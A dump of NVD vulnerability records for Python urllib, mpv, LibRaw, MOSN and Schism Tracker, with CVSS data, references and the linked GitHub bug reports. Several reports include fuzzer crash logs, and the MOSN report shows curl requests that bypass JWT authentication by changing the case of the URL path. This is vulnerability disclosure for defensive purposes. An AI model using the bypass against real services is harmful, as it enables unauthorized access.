"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LWC4WGXER5P6Q75RFGL7QUTPP3N5JR7T/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZEHSXSCMA4WWQKXT6QV7AAR6SWNZ2VP/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O5SP4RT3RRS434ZS2HQKQJ3VZW7YPKYR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OHHJHJRLEF3TDT2K3676CAUVRDD4CCMR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PEUN6T22UJFXR7J5F6UUHCXXPKJ2DVHI/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PURM5CFDABEWAIWZFD2MQ7ZJGCPYSQ44/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q3J5N24ECS4B6MJDRO6UAYU6GPLYBDCL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QRQHN7RWJQJHYP6E5EKESOYP5VDSHZG4/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RA2MBEEES6L46OD64OBSVUUMGKNGMOWW/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4IDB5OAR5Y4UK3HLMZBW4WEL2B7YFMJ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TZH26JGNZ5XYPZ5SAU3NKSBSPRE5OHTG/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U2MZOJYGFCB5PPT6AKMAU72N7QOYWLBP/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UONZWLB4QVLQIY5CPDLEUEKH6WX4VQMC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WTOAUJNDWZDRWVSXJ354AYZYKRMT56HU/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mitigation",
"Technical Description",
"Third Party Advisory"
],
"url": "https://pointernull.com/security/python-url-parse-problem.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20230324-0004/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.kb.cert.org/vuls/id/127587"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC324629-0240-4DC0-BAFA-D476D5FDDA61",
"versionEndExcluding": "3.7.17",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0A6B1607-9E1F-4A14-918F-B1A1786D028E",
"versionEndExcluding": "3.8.17",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0287FC5A-256F-40EE-93D0-2DFFE38BB5A1",
"versionEndExcluding": "3.9.17",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.9.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4AA7FA11-C746-4E69-94C2-18E745D82054",
"versionEndExcluding": "3.10.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.10.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD14A157-FEA9-411F-B338-F1B6F726599D",
"versionEndExcluding": "3.11.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.11.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*",
"matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*",
"matchCriteriaId": "B55E8D50-99B4-47EC-86F9-699B67D473CE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:management_services_for_element_software:-:*:*:*:*:*:*:*",
"matchCriteriaId": "86B51137-28D9-41F2-AFA2-3CC22B4954D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:management_services_for_netapp_hci:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4455CF3A-CC91-4BE4-A7AB-929AC82E34F5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E7CF3019-975D-40BB-A8A4-894E62BD3797",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/python/cpython/issues/102153 | [
"Issue Tracking"
] | github.com | [
"python",
"cpython"
] | Everyone (including the [submitter](https://pointernull.com/security/python-url-parse-problem.html) of the now public exploit who submitted the issue half a year ago to `security@python.org` and the [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-24329)) seems to think that #99421 "accidently fixed" CVE-2023-24329.
Did the Python Security Response Team verify that this vulnerability that was reported to them and that is now public was fixed by #99421?
The PoC from the submitter still works for me with the Debian package 3.11.2-4, which surprised me and makes me wonder whether the fix had any effect at all on the stripping of leading blanks issue in the CVE.
<!-- gh-linked-prs -->
### Linked PRs
* gh-102470
* gh-102508
* gh-104575
* gh-104592
* gh-104593
* gh-104895
* gh-104896
* gh-104918
<!-- /gh-linked-prs -->
| urllib.parse space handling CVE-2023-24329 appears unfixed | https://api.github.com/repos/python/cpython/issues/102153/comments | 37 | 2023-02-22T21:17:17Z | 2023-09-15T19:50:54Z | https://github.com/python/cpython/issues/102153 | 1,595,844,394 | 102,153 | 4,734 |
CVE-2020-19824 | 2023-02-17T18:15:10.770 | An issue in MPV v.0.29.1 fixed in v0.30 allows attackers to execute arbitrary code and crash program via the ao_c parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/mpv-player/mpv/issues/6808"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00009.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/mpv-player/mpv/issues/6808"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00009.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mpv:mpv:0.29.1:*:*:*:*:*:*:*",
"matchCriteriaId": "CA75CE4D-1BC7-451A-AA35-DDBD27E2A651",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"362"
] | 362 | https://github.com/mpv-player/mpv/issues/6808 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"mpv-player",
"mpv"
] | ### mpv version and platform
mpv 0.29.1
mpv 0.29.0-353-g65b1c2d065-dirty
MacOS 10.13.6 (17G6030)
### Reproduction steps
run script ./fuzz.sh
https://github.com/3kyo0/fuzz_samples/blob/master/fuzz.sh
### Expected behavior
crash with Segmentation fault: 11
[mkv] SeekHead position beyond end of file - incomplete file?
(+) Video --vid=1 (*) (h264 720x432 25.000fps)
(+) Audio --aid=1 --alang=fre (*) (ac3 2ch)
(+) Subs --sid=1 --slang=fre (*) (dvd_subtitle)
[mkv] Invalid EBML length at position 13124
[mkv] Corrupt file detected. Trying to resync starting from position 13124...
No video PTS! Making something up. Using 25.000000 FPS.
[ffmpeg/audio] ac3: expacc 126 is out-of-range
[ffmpeg/audio] ac3: error decoding the audio block
Audio: no audio
Segmentation fault: 11
### Actual behavior
crash
### Log file
https://github.com/3kyo0/fuzz_samples/blob/master/crashreport.txt
https://github.com/3kyo0/fuzz_samples/blob/master/HONGGFUZZ.REPORT.TXT
### Sample files
https://github.com/3kyo0/fuzz_samples/blob/master/SIGSEGV.EXC_BAD_ACCESS.PC.000000010ed954bf.STACK.0000000f38a4c8be.ADDR.000000004d555462.fuzz | race condition in audio.c on uninit | https://api.github.com/repos/mpv-player/mpv/issues/6808/comments | 6 | 2019-07-15T11:58:40Z | 2019-09-21T20:00:38Z | https://github.com/mpv-player/mpv/issues/6808 | 468,086,942 | 6,808 | 4,735 |
CVE-2021-32142 | 2023-02-17T18:15:10.860 | Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/LibRaw/LibRaw/commit/bc3aaf4223fdb70d52d470dae65c5a7923ea2a49"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/LibRaw/LibRaw/issues/400"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://github.com/gtt1995"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00025.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5ICTVDRGBWGIFBTUWJLGX7QM5GWBWUG7/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E7TEZ7CLRNYYQZJ5NJGZXK6YJU46WH2L/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5412"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.libraw.org/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/LibRaw/LibRaw/commit/bc3aaf4223fdb70d52d470dae65c5a7923ea2a49"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/LibRaw/LibRaw/issues/400"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://github.com/gtt1995"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00025.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5ICTVDRGBWGIFBTUWJLGX7QM5GWBWUG7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E7TEZ7CLRNYYQZJ5NJGZXK6YJU46WH2L/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5412"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.libraw.org/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libraw:libraw:0.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3D26C9C4-BD7A-454F-96B3-06D1EFC4A5C2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/LibRaw/LibRaw/issues/400 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"LibRaw",
"LibRaw"
] |
[poc-libRaw.zip](https://github.com/LibRaw/LibRaw/files/6293598/poc-libRaw.zip)
Reproduce step :
compile libraw with Address sanitizer
run cmd : ./libraw_cr2_fuzzer poc
### INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 3355647081
INFO: Loaded 1 modules (18101 inline 8-bit counters): 18101 [0xb3b730, 0xb3fde5),
INFO: Loaded 1 PC tables (18101 PCs): 18101 [0x815158,0x85bca8),
./libraw_cr2_fuzzer: Running 1 inputs 1 time(s) each.
Running: crash-5f77e83098892cb416521525ef399068c83941fe
=================================================================
==173755==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc443b133f at pc 0x0000005b1375 bp 0x7ffc443b1260 sp 0x7ffc443b1258
WRITE of size 1 at 0x7ffc443b133f thread T0
#0 0x5b1374 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x5b1374)
#1 0x6e29f0 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x6e29f0)
#2 0x6b0d68 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x6b0d68)
#3 0x6bf88c (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x6bf88c)
#4 0x663f0e (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x663f0e)
#5 0x598252 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x598252)
#6 0x59735a (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x59735a)
#7 0x4c916a (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x4c916a)
#8 0x5179e6 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x5179e6)
#9 0x4c9d9f (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x4c9d9f)
#10 0x4d7e93 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x4d7e93)
#11 0x4c9417 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x4c9417)
#12 0x7fc5fb3df0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#13 0x41e908 (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x41e908)
Address 0x7ffc443b133f is located in stack of thread T0 at offset 95 in frame
#0 0x6e080f (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x6e080f)
This frame has 7 object(s):
[32, 36) 'tag' (line 64)
[48, 52) 'type' (line 64)
[64, 68) 'len' (line 64)
[80, 84) 'save' (line 64)
[96, 608) 'mn_text' (line 219) <== Memory access at offset 95 underflows this variable
[672, 1184) 'ccms' (line 221)
[1248, 1256) 'last' (line 253)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/gtt/out/build/libfuzzer-latest-average/libraw/libraw_cr2_fuzzer+0x5b1374)
Shadow bytes around the buggy address:
0x10000886e210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e250: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x10000886e260: 04 f2 04 f2 04 f2 04[f2]00 00 00 00 00 00 00 00
0x10000886e270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000886e2a0: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2
0x10000886e2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==173755==ABORTING | stack-buffer-over in libRaw | https://api.github.com/repos/LibRaw/LibRaw/issues/400/comments | 18 | 2021-04-12T03:06:49Z | 2021-05-01T17:54:10Z | https://github.com/LibRaw/LibRaw/issues/400 | 855,500,920 | 400 | 4,736 |
CVE-2021-32163 | 2023-02-17T18:15:10.917 | Authentication vulnerability in MOSN v.0.23.0 allows attacker to escalate privileges via case-sensitive JWT authorization. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/mosn/mosn/issues/1633"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/mosn/mosn/pull/1637"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/mosn/mosn/issues/1633"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/mosn/mosn/pull/1637"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:modular_open_smart_network:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EAE1881D-0B37-4924-B85A-8C3A0FE7A9A7",
"versionEndExcluding": "0.23.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/mosn/mosn/issues/1633 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"mosn",
"mosn"
] | ### Describe the bug
When using [JWT authorization](https://github.com/mosn/mosn/tree/master/examples/en_readme/filter/jwtauthn), it is case-sensitive to the prefix that the URL matches, which can lead to authentication bypassing in some scenarios.
It is recommended to apply URL normalization and employ case-insensitive comparison in order to eliminate the risk of potential access control list bypasses.
### Expected behavior
Be intercepted by jwtauthn
### Actual behavior
Bypass the intercept
### Steps to reproduce
config.js
```
......
"rules": [
{
"match": {
"prefix": "/index"
},
......
```
NodeJS with Express
```
curl http://127.0.0.1:2046/index -s -o /dev/null -H "Authorization: Bearer token" -w "%{http_code}\n"
401
```
```
curl http://127.0.0.1:2046/indeX -s -o /dev/null -H "Authorization: Bearer token" -w "%{http_code}\n"
200
```
### Minimal yet complete reproducer code (or GitHub URL to code)
### Environment
- MOSN Version | case sensitive in jwtauthn match prefix | https://api.github.com/repos/mosn/mosn/issues/1633/comments | 5 | 2021-04-21T08:40:38Z | 2021-04-27T03:47:00Z | https://github.com/mosn/mosn/issues/1633 | 863,597,932 | 1,633 | 4,737 |
CVE-2021-32419 | 2023-02-17T18:15:10.970 | An issue in Schism Tracker v20200412 fixed in v.20200412 allows attacker to obtain sensitive information via the fmt_mtm_load_song function in fmt/mtm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/schismtracker/schismtracker/commit/1e2cc389a2a058fd13d99460c11115a6f7f7a6a4"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/schismtracker/schismtracker/issues/249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/schismtracker/schismtracker/commit/1e2cc389a2a058fd13d99460c11115a6f7f7a6a4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/schismtracker/schismtracker/issues/249"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schismtracker:schism_tracker:*:*:*:*:*:*:*:*",
"matchCriteriaId": "309C3449-711F-4153-8E11-79325A5B4894",
"versionEndExcluding": "20200412",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/schismtracker/schismtracker/issues/249 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"schismtracker",
"schismtracker"
] | Hi,
While fuzzing Schism Tracker git nightly rev: e665489da0e3165e926e2b01691772279ddb2247 (and also latest release Schism Tracker 20200412 ) with Honggfuzz, I found a heap-based buffer overflow READ of size 8 in the fmt_mtm_load_song() function, in mtm.c.
Attaching a reproducer (gzipped so GitHub accepts it): [testx.mtm.gz](https://github.com/schismtracker/schismtracker/files/6267539/testx.mtm.gz)
Issue can be reproduced by running:
`schismtracker testx.mtm`
**Note**: It may not crash or segfault, it silently reads 8 bytes, so to reproduce the behaviour please follow the below steps:
- `CC=clang CFLAGS="-g -fsanitize=address" ./configure`
- `make`
- `schismtracker testx.mtm`
OS Version:
```
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
```
Compiler Version:
```
clang version 10.0.0-4ubuntu1
Target: x86_64-pc-linux-gnu
Thread model: posix
InstalledDir: /usr/bin
```
```
=================================================================
==165186==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x633000018800 at pc 0x000000594375 bp 0x7ffd1cd7e4f0 sp 0x7ffd1cd7e4e8
READ of size 8 at 0x633000018800 thread T0
#0 0x594374 in fmt_mtm_load_song /home/bsdboy/schismtracker/fmt/mtm.c:210:15
#1 0x69d127 in song_create_load /home/bsdboy/schismtracker/schism/audio_loadsave.c:224:11
#2 0x69d63a in song_load_unchecked /home/bsdboy/schismtracker/schism/audio_loadsave.c:282:12
#3 0x5ee913 in main /home/bsdboy/schismtracker/schism/main.c:1132:7
#4 0x7fced812b0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41eb6d in _start (/home/bsdboy/schismtracker/schismtracker+0x41eb6d)
0x633000018800 is located 0 bytes to the right of 98304-byte region [0x633000000800,0x633000018800)
allocated by thread T0 here:
#0 0x497422 in calloc (/home/bsdboy/schismtracker/schismtracker+0x497422)
#1 0x5cb82c in mem_calloc /home/bsdboy/schismtracker/schism/util.c:113:6
#2 0x593fc3 in fmt_mtm_load_song /home/bsdboy/schismtracker/fmt/mtm.c:190:14
#3 0x69d127 in song_create_load /home/bsdboy/schismtracker/schism/audio_loadsave.c:224:11
#4 0x69d63a in song_load_unchecked /home/bsdboy/schismtracker/schism/audio_loadsave.c:282:12
#5 0x5ee913 in main /home/bsdboy/schismtracker/schism/main.c:1132:7
#6 0x7fced812b0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bsdboy/schismtracker/fmt/mtm.c:210:15 in fmt_mtm_load_song
Shadow bytes around the buggy address:
0x0c667fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c667fffb0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c667fffb0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c667fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c667fffb0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c667fffb100:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c667fffb110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
